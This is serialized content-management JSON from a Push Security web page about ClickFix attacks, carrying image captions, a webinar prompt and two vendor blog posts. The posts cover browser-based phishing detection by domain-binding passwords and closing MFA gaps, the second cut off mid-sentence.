"value":30991,"nodeType":883},{},[],{"data":34147,"content":34148,"nodeType":905},{},[],{"data":34150,"content":34151,"nodeType":909},{},[34152],{"data":34153,"marks":34154,"value":31002,"nodeType":883},{},[34155],{"type":916},{"data":34157,"content":34158,"nodeType":879},{},[34159],{"data":34160,"marks":34161,"value":31009,"nodeType":883},{},[],{"data":34163,"content":34164,"nodeType":879},{},[34165],{"data":34166,"marks":34167,"value":31016,"nodeType":883},{},[],{"data":34169,"content":34170,"nodeType":879},{},[34171],{"data":34172,"marks":34173,"value":31023,"nodeType":883},{},[],{"data":34175,"content":34176,"nodeType":879},{},[34177,34180,34187],{"data":34178,"marks":34179,"value":31030,"nodeType":883},{},[],{"data":34181,"content":34182,"nodeType":940},{"uri":31033},[34183],{"data":34184,"marks":34185,"value":31039,"nodeType":883},{},[34186],{"type":948},{"data":34188,"marks":34189,"value":31043,"nodeType":883},{},[],{"data":34191,"content":34192,"nodeType":879},{},[34193],{"data":34194,"marks":34195,"value":31050,"nodeType":883},{},[],{"data":34197,"content":34200,"nodeType":971},{"target":34198},{"sys":34199},{"id":31055,"type":976,"linkType":977},[],{"data":34202,"content":34203,"nodeType":879},{},[34204,34207,34213],{"data":34205,"marks":34206,"value":31063,"nodeType":883},{},[],{"data":34208,"content":34209,"nodeType":940},{"uri":30527},[34210],{"data":34211,"marks":34212,"value":31070,"nodeType":883},{},[],{"data":34214,"marks":34215,"value":31074,"nodeType":883},{},[],{"data":34217,"content":34220,"nodeType":971},{"target":34218},{"sys":34219},{"id":31079,"type":976,"linkType":977},[],{"data":34222,"content":34223,"nodeType":905},{},[],{"data":34225,"content":34226,"nodeType":909},{},[34227],{"data":34228,"marks":34229,"value":31091,"nodeType":883},{},[34230],{"type":916},{"data":34232,"content":34233,"nodeType":879},{},[34234],{"data":34235,"marks":34236,"value":31098,"nodeType":883},{},[],{"data":34238,"content":34239,"nodeType":1036},{},[34240],{"data":34241,"marks":34242,"value":31106,"nodeType":883},{},[34243],{"type":916},{"data":34245,"content":34246,"nodeType":879},{},[34247,34250,34257],{"data":34248,"marks":34249,"value":31113,"nodeType":883},{},[],{"data":34251,"content":34252,"nodeType":940},{"uri":31116},[34253],{"data":34254,"marks":34255,"value":31122,"nodeType":883},{},[34256],{"type":948},{"data":34258,"marks":34259,"value":31126,"nodeType":883},{},[],{"data":34261,"content":34262,"nodeType":879},{},[34263],{"data":34264,"marks":34265,"value":31133,"nodeType":883},{},[],{"data":34267,"content":34268,"nodeType":879},{},[34269],{"data":34270,"marks":34271,"value":31140,"nodeType":883},{},[],{"data":34273,"content":34274,"nodeType":879},{},[34275],{"data":34276,"marks":34277,"value":31147,"nodeType":883},{},[],{"data":34279,"content":34280,"nodeType":1036},{},[34281],{"data":34282,"marks":34283,"value":31155,"nodeType":883},{},[34284],{"type":916},{"data":34286,"content":34287,"nodeType":879},{},[34288],{"data":34289,"marks":34290,"value":31162,"nodeType":883},{},[],{"data":34292,"content":34293,"nodeType":879},{},[34294],{"data":34295,"marks":34296,"value":31169,"nodeType":883},{},[],{"data":34298,"content":34301,"nodeType":971},{"target":34299},{"sys":34300},{"id":31174,"type":976,"linkType":977},[],{"data":34303,"content":34304,"nodeType":879},{},[34305],{"data":34306,"marks":34307,"value":31182,"nodeType":883},{},[],{"data":34309,"content":34310,"nodeType":1531},{},[34311,34320,34329],{"data":34312,"content":34313,"nodeType":1535},{},[34314],{"data":34315,"content":34316,"nodeType":879},{},[34317],{"data":34318,"marks":34319,"value":31195,"nodeType":883},{},[],{"data":34321,"content":34322,"nodeType":1535},{},[34323],{"data":34324,"content":34325,"nodeType":879},{},[34326],{"data":34327,"marks":34328,"value":31205,"nodeType":883},{},[],{"data":34330,"content":34331,"nodeType":1535},{},[34332],{"data":34333,"content":34334,"nodeType":879},{},[34335],{"data":34336,"marks":34337,"value":31215,"nodeType":883},{},[],{"data":34339,"content":34342,"nodeType":971},{"target":34340},{"sys":34341},{"id":31220,"type":976,"linkType":977},[],{"data":34344,"content":34345,"nodeType":1036},{},[34346],{"data":34347,"marks":34348,"value":31229,"nodeType":883},{},[34349],{"type":916},{"data":34351,"content":34352,"nodeType":879},{},[34353,34356,34363],{"data":34354,"marks":34355,"value":31236,"nodeType":883},{},[],{"data":34357,"content":34358,"nodeType":940},{"uri":30872},[34359],{"data":34360,"marks":34361,"value":31244,"nodeType":883},{},[34362],{"type":948},{"data":34364,"marks":34365,"value":31248,"nodeType":883},{},[],{"data":34367,"content":34368,"nodeType":879},{},[34369],{"data":34370,"marks":34371,"value":31255,"nodeType":883},{},[],{"data":34373,"content":34374,"nodeType":1531},{},[34375,34384],{"data":34376,"content":34377,"nodeType":1535},{},[34378],{"data":34379,"content":34380,"nodeType":879},{},[34381],{"data":34382,"marks":34383,"value":31268,"nodeType":883},{},[],{"data":34385,"content":34386,"nodeType":1535},{},[34387],{"data":34388,"content":34389,"nodeType":879},{},[34390],{"data":34391,"marks":34392,"value":31278,"nodeType":883},{},[],{"data":34394,"content":34395,"nodeType":879},{},[34396],{"data":34397,"marks":34398,"value":31285,"nodeType":883},{},[],{"data":34400,"content":34401,"nodeType":879},{},[34402],{"data":34403,"marks":34404,"value":31292,"nodeType":883},{},[],{"data":34406,"content":34409,"nodeType":971},{"target":34407},{"sys":34408},{"id":31297,"type":976,"linkType":977},[],{"data":34411,"content":34412,"nodeType":879},{},[34413],{"data":34414,"marks":34415,"value":31305,"nodeType":883},{},[],{"data":34417,"content":34418,"nodeType":905},{},[],{"data":34420,"content":34421,"nodeType":909},{},[34422],{"data":34423,"marks":34424,"value":31316,"nodeType":883},{},[34425],{"type":916},{"data":34427,"content":34428,"nodeType":879},{},[34429,34432,34436],{"data":34430,"marks":34431,"value":30971,"nodeType":883},{},[],{"data":34433,"marks":34434,"value":30751,"nodeType":883},{},[34435],{"type":916},{"data":34437,"marks":34438,"value":31330,"nodeType":883},{},[],{"data":34440,"content":34441,"nodeType":879},{},[34442,34445,34452],{"data":34443,"marks":34444,"value":31337,"nodeType":883},{},[],{"data":34446,"content":34447,"nodeType":940},{"uri":31340},[34448],{"data":34449,"marks":34450,"value":31346,"nodeType":883},{},[34451],{"type":948},{"data":34453,"marks":34454,"value":31350,"nodeType":883},{},[],{"data":34456,"content":34457,"nodeType":879},{},[34458],{"data":34459,"marks":34460,"value":31357,"nodeType":883},{},[],{"data":34462,"content":34463,"nodeType":879},{},[34464],{"data":34465,"marks":34466,"value":31364,"nodeType":883},{},[],{"data":34468,"content":34469,"nodeType":879},{},[34470],{"data":34471,"marks":34472,"value":31371,"nodeType":883},{},[],{"data":34474,"content":34477,"nodeType":971},{"target":34475},{"sys":34476},{"id":30774,"type":976,"linkType":977},[],{"data":34479,"content":34480,"nodeType":1036},{},[34481],{"data":34482,"marks":34483,"value":31384,"nodeType":883},{},[34484],{"type":916},{"data":34486,"content":34487,"nodeType":879},{},[34488,34491,34497],{"data":34489,"marks":34490,"value":31391,"nodeType":883},{},[],{"data":34492,"content":34493,"nodeType":940},{"uri":31394},[34494],{"data":34495,"marks":34496,"value":31399,"nodeType":883},{},[],{"data":34498,"marks":34499,"value":31403,"nodeType":883},{},[],{"data":34501,"content":34502,"nodeType":905},{},[],{"data":34504,"content":34505,"nodeType":909},{},[34506],{"data":34507,"marks":34508,"value":12611,"nodeType":883},{},[34509],{"type":916},{"data":34511,"content":34512,"nodeType":879},{},[34513],{"data":34514,"marks":34515,"value":31420,"nodeType":883},{},[],{"data":34517,"content":34518,"nodeType":879},{},[34519],{"data":34520,"marks":34521,"value":31427,"nodeType":883},{},[],{"data":34523,"content":34524,"nodeType":879},{},[34525],{"data":34526,"marks":34527,"value":31434,"nodeType":883},{},[],{"data":34529,"content":34530,"nodeType":879},{},[34531],{"data":34532,"marks":34533,"value":31441,"nodeType":883},{},[],{"data":34535,"content":34536,"nodeType":879},{},[34537,34540,34547,34550,34557],{"data":34538,"marks":34539,"value":16267,"nodeType":883},{},[],{"data":34541,"content":34542,"nodeType":940},{"uri":10222},[34543],{"data":34544,"marks":34545,"value":10228,"nodeType":883},{},[34546],{"type":948},{"data":34548,"marks":34549,"value":26256,"nodeType":883},{},[],{"data":34551,"content":34552,"nodeType":940},{"uri":4772},[34553],{"data":34554,"marks":34555,"value":1751,"nodeType":883},{},[34556],{"type":948},{"data":34558,"marks":34559,"value":1350,"nodeType":883},{},[],{"data":34561,"content":34564,"nodeType":971},{"target":34562},{"sys":34563},{"id":31220,"type":976,"linkType":977},[],{"data":34566,"content":34567,"nodeType":879},{},[34568],{"data":34569,"marks":34570,"value":21,"nodeType":883},{},[],{"entries":34572},{"hyperlink":34573,"inline":34574,"block":34575},[],[],[34576,34578,34582,34588,34615,34621],{"sys":34577,"__typename":6000,"title":32114,"arcadeDemoUrl":32115,"playText":26812},{"id":30774},{"sys":34579,"__typename":1765,"title":34580,"caption":34580,"layoutMode":59,"file":34581},{"id":31055},"Phishing delivery channels have significantly expanded from the days of email-based phishing attacks",{"url":32088,"width":32089,"height":32090},{"sys":34583,"__typename":1765,"title":34584,"caption":34584,"layoutMode":59,"file":34585},{"id":31079},"Examples of ClickFix lures used by attackers in the wild.",{"url":34586,"width":1781,"height":34587},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7AH10e5YpESPdIBIH4YjHO\u002Fe7d5553657b6b0f20d6ed563d69af1e4\u002Fimage3.png",1955,{"sys":34589,"__typename":1785,"content":34590,"name":34614,"title":59},{"id":31174},{"json":34591},{"nodeType":875,"data":34592,"content":34593},{},[34594],{"nodeType":879,"data":34595,"content":34596},{},[34597,34601,34610],{"nodeType":883,"value":34598,"marks":34599,"data":34600},"Attacks on BYOD or personal devices are increasingly leading to corporate breaches where email accounts are being used to sign into corporate browser profiles. This results in corporate credentials inadvertently saved and synced across devices being exposed in the breach (the most well-known example of this being in ",[],{},{"nodeType":940,"data":34602,"content":34604},{"uri":34603},"https:\u002F\u002Fsec.okta.com\u002Farticles\u002F2023\u002F11\u002Funauthorized-access-oktas-support-case-management-system-root-cause\u002F?utm_source=chatgpt.com",[34605],{"nodeType":883,"value":34606,"marks":34607,"data":34609},"Okta’s 2023 support case management system breach",[34608],{"type":948},{},{"nodeType":883,"value":34611,"marks":34612,"data":34613},").",[],{},"clickfix insight box 1",{"sys":34616,"__typename":13297,"type":13298,"ctaText":34617,"buttonLabel":34618,"buttonColour":34619,"buttonUrl":34620},{"id":31220},"Register for our webinar to learn more about the latest developments in ClickFix attacks and why they're so effective.","Register Now","sea blue","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fclickfix",{"sys":34622,"__typename":1765,"title":34623,"caption":34623,"layoutMode":59,"file":34624},{"id":31297},"ClickFix builder screenshots. Source: Microsoft",{"url":34625,"width":1781,"height":34626},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2adTEIfv1YmEkXzzKA5UFC\u002F47fd4025b72923dd0a1a16eb736e8980\u002Fimage2.png",540,{"items":34628},[],{},"Detect ClickFix-style attacks in the browser","product-feature",{"items":34633},[34634,34970,35631],{"__typename":1967,"sys":34635,"content":34637,"title":34953,"synopsis":34954,"hashTags":59,"publishedDate":34955,"slug":34956,"tagsCollection":34957,"authorsCollection":34963},{"id":34636},"4bYO5rVy9n2OO3vtMVQeda",{"json":34638},{"data":34639,"content":34640,"nodeType":875},{},[34641,34648,34666,34682,34689,34696,34699,34706,34713,34766,34773,34779,34782,34789,34796,34803,34810,34817,34834,34840,34847,34854,34871,34877,34884,34891,34898,34905,34912,34915,34922,34941,34947],{"data":34642,"content":34643,"nodeType":909},{},[34644],{"data":34645,"marks":34646,"value":34647,"nodeType":883},{},[],"All phishing eventually leads to the browser",{"data":34649,"content":34650,"nodeType":879},{},[34651,34655,34663],{"data":34652,"marks":34653,"value":34654,"nodeType":883},{},[],"The best attack detection methods are those that focus on ",{"data":34656,"content":34657,"nodeType":940},{"uri":20441},[34658],{"data":34659,"marks":34660,"value":34662,"nodeType":883},{},[34661],{"type":948},"detecting indicators that are difficult for attackers to change or obfuscate",{"data":34664,"marks":34665,"value":3386,"nodeType":883},{},[],{"data":34667,"content":34668,"nodeType":879},{},[34669,34673,34678],{"data":34670,"marks":34671,"value":34672,"nodeType":883},{},[],"For a credential phishing attack to succeed, the victim ",{"data":34674,"marks":34675,"value":34677,"nodeType":883},{},[34676],{"type":948},"has",{"data":34679,"marks":34680,"value":34681,"nodeType":883},{},[]," to enter their password into a webpage. There’s no two-ways about it, attackers cannot change this. ",{"data":34683,"content":34684,"nodeType":879},{},[34685],{"data":34686,"marks":34687,"value":34688,"nodeType":883},{},[],"So it stands to reason that, if you can detect this user behavior, and block them from entering their password, then you can stop phishing. ",{"data":34690,"content":34691,"nodeType":879},{},[34692],{"data":34693,"marks":34694,"value":34695,"nodeType":883},{},[],"This is exactly what Push does.",{"data":34697,"content":34698,"nodeType":905},{},[],{"data":34700,"content":34701,"nodeType":1036},{},[34702],{"data":34703,"marks":34704,"value":34705,"nodeType":883},{},[],"Most anti-phishing tools are easily bypassed",{"data":34707,"content":34708,"nodeType":879},{},[34709],{"data":34710,"marks":34711,"value":34712,"nodeType":883},{},[],"Other anti-phishing tools rely on detecting elements of the attack that attackers can change and hide, such as domains or the webpage contents. Attackers use tricks to evade these detection, like:",{"data":34714,"content":34715,"nodeType":1531},{},[34716,34726,34736,34746,34756],{"data":34717,"content":34718,"nodeType":1535},{},[34719],{"data":34720,"content":34721,"nodeType":879},{},[34722],{"data":34723,"marks":34724,"value":34725,"nodeType":883},{},[],"Using Cloudflare Workers to block automatic analysis of their phishing site",{"data":34727,"content":34728,"nodeType":1535},{},[34729],{"data":34730,"content":34731,"nodeType":879},{},[34732],{"data":34733,"marks":34734,"value":34735,"nodeType":883},{},[],"Hacking a Wordpress blog to get a reputable domain that passes domain checks ",{"data":34737,"content":34738,"nodeType":1535},{},[34739],{"data":34740,"content":34741,"nodeType":879},{},[34742],{"data":34743,"marks":34744,"value":34745,"nodeType":883},{},[],"Using redirects and rotating the URLs delivered to the victim to bypass link analysis",{"data":34747,"content":34748,"nodeType":1535},{},[34749],{"data":34750,"content":34751,"nodeType":879},{},[34752],{"data":34753,"marks":34754,"value":34755,"nodeType":883},{},[],"Randomizing the HTML title for the web page to bypass blocklists ",{"data":34757,"content":34758,"nodeType":1535},{},[34759],{"data":34760,"content":34761,"nodeType":879},{},[34762],{"data":34763,"marks":34764,"value":34765,"nodeType":883},{},[],"One-time phishing links that only work the first time they are clicked",{"data":34767,"content":34768,"nodeType":879},{},[34769],{"data":34770,"marks":34771,"value":34772,"nodeType":883},{},[],"Push is putting an end to this game of cat and mouse, by keeping it really simple; you can’t phish someone who can’t put their password into a phishing page. ",{"data":34774,"content":34778,"nodeType":971},{"target":34775},{"sys":34776},{"id":34777,"type":976,"linkType":977},"6AwOZSpqaChmeksnj4SyWE",[],{"data":34780,"content":34781,"nodeType":905},{},[],{"data":34783,"content":34784,"nodeType":1036},{},[34785],{"data":34786,"marks":34787,"value":34788,"nodeType":883},{},[],"Domain-binding passwords",{"data":34790,"content":34791,"nodeType":879},{},[34792],{"data":34793,"marks":34794,"value":34795,"nodeType":883},{},[],"If you’re familiar with how passkeys are domain-bound, then think of what Push does as domain-binding passwords. We pin the password to its legitimate domain(s) and then don’t allow it to be entered into any webpage on any other domain. ",{"data":34797,"content":34798,"nodeType":879},{},[34799],{"data":34800,"marks":34801,"value":34802,"nodeType":883},{},[],"But just because you’ve stopped your users from being phished doesn’t mean you don’t want to know when attackers are attempting to phish your users and how. ",{"data":34804,"content":34805,"nodeType":879},{},[34806],{"data":34807,"marks":34808,"value":34809,"nodeType":883},{},[],"Push still inspects webpages to see if attackers are rendering cloned app login pages in the browser or if known AitM and BitM toolkits are being used. This way you don’t lose visibility of the unsuccessful attacks that are targeting your users. Think of it as a handy second and third layer of defense.",{"data":34811,"content":34812,"nodeType":879},{},[34813],{"data":34814,"marks":34815,"value":34816,"nodeType":883},{},[],"Lets run through a quick before and after example:",{"data":34818,"content":34819,"nodeType":1036},{},[34820,34824,34830],{"data":34821,"marks":34822,"value":34823,"nodeType":883},{},[],"Scenario 1: An attacker attempts to phish an employee that ",{"data":34825,"marks":34826,"value":34829,"nodeType":883},{},[34827,34828],{"type":948},{"type":916},"doesn’t",{"data":34831,"marks":34832,"value":34833,"nodeType":883},{},[]," have Push deployed to their browser.",{"data":34835,"content":34839,"nodeType":971},{"target":34836},{"sys":34837},{"id":34838,"type":976,"linkType":977},"2CbGMUSJsP1mNeHkmpLl6N",[],{"data":34841,"content":34842,"nodeType":879},{},[34843],{"data":34844,"marks":34845,"value":34846,"nodeType":883},{},[],"Here, an attacker hacks a Wordpress blog to get a reputable domain and then runs a phishing toolkit on the webpage. They email one of your employees a link to it. Your SWG \u002F email scanning solution inspects it in a sandbox but the phish kit detects this and redirects to a benign site so that it passes the inspection. ",{"data":34848,"content":34849,"nodeType":879},{},[34850],{"data":34851,"marks":34852,"value":34853,"nodeType":883},{},[],"Your user gets the email with the link and is now free to interact with the phishing page. They enter their credentials plus MFA code into the page and voila! The attacker steals them and is able to compromise the user’s account.  ",{"data":34855,"content":34856,"nodeType":1036},{},[34857,34861,34867],{"data":34858,"marks":34859,"value":34860,"nodeType":883},{},[],"Scenario 2: An attacker attempts to phish an employee that ",{"data":34862,"marks":34863,"value":34866,"nodeType":883},{},[34864,34865],{"type":948},{"type":916},"does",{"data":34868,"marks":34869,"value":34870,"nodeType":883},{},[]," have Push deployed to their browser. ",{"data":34872,"content":34876,"nodeType":971},{"target":34873},{"sys":34874},{"id":34875,"type":976,"linkType":977},"77smnID1woCfFJrJPyTvKY",[],{"data":34878,"content":34879,"nodeType":879},{},[34880],{"data":34881,"marks":34882,"value":34883,"nodeType":883},{},[],"This time, the attacker uses the same phishing toolkit and domain from the first example. But in reality, they don’t have to send it to your employee using email, instead, they could use LinkedIn messenger, Slack, Teams, or any application that allows employees to communicate with each other. ",{"data":34885,"content":34886,"nodeType":879},{},[34887],{"data":34888,"marks":34889,"value":34890,"nodeType":883},{},[],"Like before, the user receives the link, opens it and starts to enter their credentials into the webpage. This time though, the Push browser extension inspects the webpage running in the user's browser. Push observes that the webpage is a login page and the user is entering their password into the page.",{"data":34892,"content":34893,"nodeType":879},{},[34894],{"data":34895,"marks":34896,"value":34897,"nodeType":883},{},[],"The first detection Push makes is checking that the password the user is entering matches the domain that password is pinned to. Since it doesn't match, based on this detection alone the user is automatically redirected to a blocking page. An important point to make here is that the password never leaves the user’s browser and the check is made using a shortened salted hash of the password.   ",{"data":34899,"content":34900,"nodeType":879},{},[34901],{"data":34902,"marks":34903,"value":34904,"nodeType":883},{},[],"The second detection Push makes is that the rendered web app is using a cloned app login page. The third detection is that a phishing toolkit is running in the web app code. ",{"data":34906,"content":34907,"nodeType":879},{},[34908],{"data":34909,"marks":34910,"value":34911,"nodeType":883},{},[],"In this particular scenario these second and third detections serve as useful context for understanding the nature of the phishing attack. But both will still redirect to a blocking page if they are triggered in isolation of the other phishing detections. ",{"data":34913,"content":34914,"nodeType":905},{},[],{"data":34916,"content":34917,"nodeType":909},{},[34918],{"data":34919,"marks":34920,"value":34921,"nodeType":883},{},[],"We don’t just stop phishing attacks",{"data":34923,"content":34924,"nodeType":879},{},[34925,34929,34937],{"data":34926,"marks":34927,"value":34928,"nodeType":883},{},[],"We also detect other identity-related attack techniques used to compromise user accounts. That includes credential stuffing, password spraying and session hijacking using stolen session tokens. If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",{"data":34930,"content":34931,"nodeType":940},{"uri":3254},[34932],{"data":34933,"marks":34934,"value":34936,"nodeType":883},{},[34935],{"type":948},"book some time with one of our team",{"data":34938,"marks":34939,"value":34940,"nodeType":883},{},[],".  ",{"data":34942,"content":34946,"nodeType":971},{"target":34943},{"sys":34944},{"id":34945,"type":976,"linkType":977},"2JSmYDaiAciOx7Z1MRuJlA",[],{"data":34948,"content":34949,"nodeType":879},{},[34950],{"data":34951,"marks":34952,"value":21,"nodeType":883},{},[],"Detecting and blocking phishing attacks in the browser","How Push detects and blocks phishing attempts in the browser – explained in less than two minutes. ","2024-10-23T00:00:00.000Z","detecting-and-blocking-phishing-attacks-in-the-browser",{"items":34958},[34959,34961],{"sys":34960,"name":3273},{"id":3272},{"sys":34962,"name":343},{"id":3276},{"items":34964},[34965],{"fullName":34966,"firstName":34967,"jobTitle":4799,"profilePicture":34968},"Alex Henshall","Alex",{"url":34969},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2rz3Pre3b1MexPIQ4hzPUe\u002F0ef8a092b7e7df00fbce3f7d1ccb96d1\u002FAlex_Henshall.jpeg",{"__typename":1967,"sys":34971,"content":34973,"title":35617,"synopsis":35618,"hashTags":59,"publishedDate":35619,"slug":35620,"tagsCollection":35621,"authorsCollection":35627},{"id":34972},"wikyVxlHwKUOKM9xo19eP",{"json":34974},{"data":34975,"content":34976,"nodeType":875},{},[34977,34983,34986,34993,35016,35047,35057,35077,35084,35090,35097,35112,35119,35122,35129,35136,35155,35162,35208,35215,35221,35227,35234,35267,35281,35284,35291,35298,35305,35312,35319,35326,35333,35440,35446,35461,35468,35483,35516,35531,35538,35553,35559,35566,35573,35579,35586,35592,35599],{"data":34978,"content":34982,"nodeType":971},{"target":34979},{"sys":34980},{"id":34981,"type":976,"linkType":977},"1hUpsNwuhEXwSPijvRflTq",[],{"data":34984,"content":34985,"nodeType":905},{},[],{"data":34987,"content":34988,"nodeType":879},{},[34989],{"data":34990,"marks":34991,"value":34992,"nodeType":883},{},[],"There are two things every security operations engineer can agree on:",{"data":34994,"content":34995,"nodeType":1531},{},[34996,35006],{"data":34997,"content":34998,"nodeType":1535},{},[34999],{"data":35000,"content":35001,"nodeType":879},{},[35002],{"data":35003,"marks":35004,"value":35005,"nodeType":883},{},[],"Get MFA on every account on every app.",{"data":35007,"content":35008,"nodeType":1535},{},[35009],{"data":35010,"content":35011,"nodeType":879},{},[35012],{"data":35013,"marks":35014,"value":35015,"nodeType":883},{},[],"This is stupidly harder to achieve than it seems.",{"data":35017,"content":35018,"nodeType":879},{},[35019,35023,35031,35035,35043],{"data":35020,"marks":35021,"value":35022,"nodeType":883},{},[],"The penalties for failing to solve this hard simple problem are abundantly clear. Stolen credentials accounted for roughly half of the initial access methods observed this year across 30,000+ attacks, according to Verizon’s 2024 ",{"data":35024,"content":35025,"nodeType":940},{"uri":1421},[35026],{"data":35027,"marks":35028,"value":35030,"nodeType":883},{},[35029],{"type":948},"Data Breach Investigations Report",{"data":35032,"marks":35033,"value":35034,"nodeType":883},{},[],". And ",{"data":35036,"content":35038,"nodeType":940},{"uri":35037},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002F2024-identity-breaches\u002F",[35039],{"data":35040,"marks":35041,"value":35042,"nodeType":883},{},[],"in a review of 30 publicly disclosed breaches involving identity attacks",{"data":35044,"marks":35045,"value":35046,"nodeType":883},{},[]," in 2024, we found that 73% (almost three-quarters) were the result of compromised credentials, with the rest the result of phishing. ",{"data":35048,"content":35049,"nodeType":4197},{},[35050],{"data":35051,"content":35052,"nodeType":879},{},[35053],{"data":35054,"marks":35055,"value":35056,"nodeType":883},{},[],"Three-quarters of publicly disclosed breaches involving identity attacks in 2024 involved compromised credentials and missing MFA.",{"data":35058,"content":35059,"nodeType":879},{},[35060,35064,35073],{"data":35061,"marks":35062,"value":35063,"nodeType":883},{},[],"In the case of the ",{"data":35065,"content":35067,"nodeType":940},{"uri":35066},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsnowflake-retro\u002F",[35068],{"data":35069,"marks":35070,"value":35072,"nodeType":883},{},[35071],{"type":948},"Snowflake incident",{"data":35074,"marks":35075,"value":35076,"nodeType":883},{},[]," earlier this year, a lack of MFA meant the difference between an enormous and murky firefight to clean up accounts breached with legitimate credentials, and a decent night’s sleep. The result was hundreds of millions of breached customer records, nine publicly named victims, and at least one ransom paid.",{"data":35078,"content":35079,"nodeType":879},{},[35080],{"data":35081,"marks":35082,"value":35083,"nodeType":883},{},[],"“Do you know how many accounts we have on this third-party service, who owns them, how many tenants, whether those creds are shared elsewhere, and their security posture?” is not a fun question to answer on a Friday. ",{"data":35085,"content":35089,"nodeType":971},{"target":35086},{"sys":35087},{"id":35088,"type":976,"linkType":977},"6hg6PLXWMZaEDnGekHEzmD",[],{"data":35091,"content":35092,"nodeType":879},{},[35093],{"data":35094,"marks":35095,"value":35096,"nodeType":883},{},[],"For SecOps teams we’ve helped here at Push that responded to incidents affecting third-party apps (like Snowflake), the first item on the recovery plan is to finally solve that hard simple problem: No more MFA gaps.",{"data":35098,"content":35099,"nodeType":879},{},[35100,35104,35108],{"data":35101,"marks":35102,"value":35103,"nodeType":883},{},[],"With our latest feature release, ",{"data":35105,"marks":35106,"value":26392,"nodeType":883},{},[35107],{"type":916},{"data":35109,"marks":35110,"value":35111,"nodeType":883},{},[],", this is so much easier. With MFA enforcement, Push administrators can configure a control to prompt employees to enroll in MFA whenever Push detects that they’re not registered — even on apps that don’t natively provide any administrative enforcement option for MFA. This capability is made possible by the Push browser extension, which uses in-browser messaging and simple workflows to guide users right where they work.",{"data":35113,"content":35114,"nodeType":879},{},[35115],{"data":35116,"marks":35117,"value":35118,"nodeType":883},{},[],"In this article, we’ll cover how Push helps you identify and close MFA gaps, how our new enforcement feature is one part of that solution, and how you can test the platform yourself.",{"data":35120,"content":35121,"nodeType":905},{},[],{"data":35123,"content":35124,"nodeType":909},{},[35125],{"data":35126,"marks":35127,"value":35128,"nodeType":883},{},[],"Shining a light on MFA gaps",{"data":35130,"content":35131,"nodeType":879},{},[35132],{"data":35133,"marks":35134,"value":35135,"nodeType":883},{},[],"There’s no question that the rise of ubiquitous multi-factor authentication has been an enormous advance for defenders in cybersecurity. ",{"data":35137,"content":35138,"nodeType":879},{},[35139,35143,35152],{"data":35140,"marks":35141,"value":35142,"nodeType":883},{},[],"Yet several years into this journey, the problem of verifying and enforcing MFA coverage across an organization remains a bit of a ",{"data":35144,"content":35146,"nodeType":940},{"uri":35145},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FPuzzle_box",[35147],{"data":35148,"marks":35149,"value":35151,"nodeType":883},{},[35150],{"type":948},"puzzle box",{"data":35153,"marks":35154,"value":1350,"nodeType":883},{},[],{"data":35156,"content":35157,"nodeType":879},{},[35158],{"data":35159,"marks":35160,"value":35161,"nodeType":883},{},[],"Why is this?",{"data":35163,"content":35164,"nodeType":1531},{},[35165,35175,35185],{"data":35166,"content":35167,"nodeType":1535},{},[35168],{"data":35169,"content":35170,"nodeType":879},{},[35171],{"data":35172,"marks":35173,"value":35174,"nodeType":883},{},[],"Complex overlapping (and occasionally contradictory) configurations for enterprise MFA solutions can result in entire employee groups not registered for MFA, and other critical missing pieces.",{"data":35176,"content":35177,"nodeType":1535},{},[35178],{"data":35179,"content":35180,"nodeType":879},{},[35181],{"data":35182,"marks":35183,"value":35184,"nodeType":883},{},[],"With a sprawling ecosystem of both SSO-managed and unmanaged self-adopted SaaS, MFA coverage ends up looking more like a patchwork than a unified layer of protection. Security teams lack visibility of freemium and self-purchased apps, and when signup is simple, many users will naturally skip MFA registration to remove a layer of friction. The end result is often a suite of core apps managed via SSO that enforce MFA — and a lot of other unmanaged apps that don’t (true nightmare fodder).",{"data":35186,"content":35187,"nodeType":1535},{},[35188],{"data":35189,"content":35190,"nodeType":879},{},[35191,35195,35204],{"data":35192,"marks":35193,"value":35194,"nodeType":883},{},[],"Another annoying piece of the puzzle box: Even in organizations with a high adoption rate of phishing-resistant MFA methods, having backup MFA methods (and a lack of total visibility into all of those registered methods) can create situations where ",{"data":35196,"content":35198,"nodeType":940},{"uri":35197},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fmfa_downgrade\u002Fdescription.md",[35199],{"data":35200,"marks":35201,"value":35203,"nodeType":883},{},[35202],{"type":948},"MFA downgrade attacks",{"data":35205,"marks":35206,"value":35207,"nodeType":883},{},[]," are still possible. In MFA downgrade attacks, backup MFA methods that are less secure such as SMS or TOTP can be exploited, effectively bypassing more phishing-resistant methods.",{"data":35209,"content":35210,"nodeType":879},{},[35211],{"data":35212,"marks":35213,"value":35214,"nodeType":883},{},[],"The challenges of solving this puzzle are evident. ",{"data":35216,"content":35220,"nodeType":971},{"target":35217},{"sys":35218},{"id":35219,"type":976,"linkType":977},"2BBiFx8pHjSCeLTlP6n6da",[],{"data":35222,"content":35226,"nodeType":971},{"target":35223},{"sys":35224},{"id":35225,"type":976,"linkType":977},"2QnWVpPYRyJQaQ5TuKSSLp",[],{"data":35228,"content":35229,"nodeType":879},{},[35230],{"data":35231,"marks":35232,"value":35233,"nodeType":883},{},[],"To shine a light on MFA gaps, then, security teams need three things:",{"data":35235,"content":35236,"nodeType":1531},{},[35237,35247,35257],{"data":35238,"content":35239,"nodeType":1535},{},[35240],{"data":35241,"content":35242,"nodeType":879},{},[35243],{"data":35244,"marks":35245,"value":35246,"nodeType":883},{},[],"A full accounting of their identity attack surface, including accounts on unmanaged and freemium apps not on SSO.",{"data":35248,"content":35249,"nodeType":1535},{},[35250],{"data":35251,"content":35252,"nodeType":879},{},[35253],{"data":35254,"marks":35255,"value":35256,"nodeType":883},{},[],"A trustworthy out-of-band method for verifying MFA coverage, beyond the tangle of conditional access rules.",{"data":35258,"content":35259,"nodeType":1535},{},[35260],{"data":35261,"content":35262,"nodeType":879},{},[35263],{"data":35264,"marks":35265,"value":35266,"nodeType":883},{},[],"Visibility into which MFA methods are registered to a given 